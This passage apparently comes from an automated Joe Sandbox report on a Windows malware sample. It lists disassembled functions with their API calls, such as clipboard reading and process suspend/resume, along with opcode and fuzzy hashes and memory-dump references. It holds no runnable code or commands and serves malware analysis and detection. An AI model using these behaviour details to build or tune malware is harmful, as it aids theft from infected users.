                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                  • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                  • CloseClipboard.USER32 ref: 0040B760
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseDataOpen
                                                  • String ID:
                                                  • API String ID: 2058664381-0
                                                  • Opcode ID: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                  • Opcode Fuzzy Hash: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                  • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenResume
                                                  • String ID:
                                                  • API String ID: 3614150671-0
                                                  • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                  • Instruction ID: dbaabbb0ea2570487ff62d8cf89bd30b477e7113d13ca21b8680662729a76e86
                                                  • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                  • Instruction Fuzzy Hash: 66D05E36204121E3C320176A7C0CD97AD68DBC5AA2705412AF804C26649A60CC0186E4
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                  • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenSuspend
                                                  • String ID:
                                                  • API String ID: 1999457699-0
                                                  • Opcode ID: 15699d522662e94a36dc9f627e6c03bf4f255e4023340f214c75571920ff47a0
                                                  • Instruction ID: 1e4755145751be78863ec26184204985b99a3e1fec7ed1e2fa2d7a7f5aac3163
                                                  • Opcode Fuzzy Hash: 15699d522662e94a36dc9f627e6c03bf4f255e4023340f214c75571920ff47a0
                                                  • Instruction Fuzzy Hash: 73D05E36104121E3C6211B6A7C0CD97AD68DFC5AA2705412AF904D26509A20CC0186E4
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-3916222277
                                                  • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                  • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                  • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                  • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                  • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                  • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: JD
                                                  • API String ID: 1084509184-2669065882
                                                  • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                  • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                  • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                  • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2299586839-2904428671
                                                  • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                  • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID:
                                                  • API String ID: 3859560861-0
                                                  • Opcode ID: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                                  • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                  • Opcode Fuzzy Hash: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                                  • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                  • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                                  • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                  • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                  • Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
                                                  • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                  • Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                  • String ID:
                                                  • API String ID: 2692324296-0
                                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                  • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                  • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                  APIs
                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                  • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                  • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                  • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                  • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EF0,00475A10,00474EF0,00000000,00474EF0,00000000,00474EF0,5.2.0 Pro), ref: 0040F920
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 4f66370edde0bdaa3bcc008f8ea5ce22c00289683c96eec7ff0f1ed7c7935faa
                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                  • Opcode Fuzzy Hash: 4f66370edde0bdaa3bcc008f8ea5ce22c00289683c96eec7ff0f1ed7c7935faa
                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                  • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  • Instruction Fuzzy Hash:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                  • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                                  • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                  • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
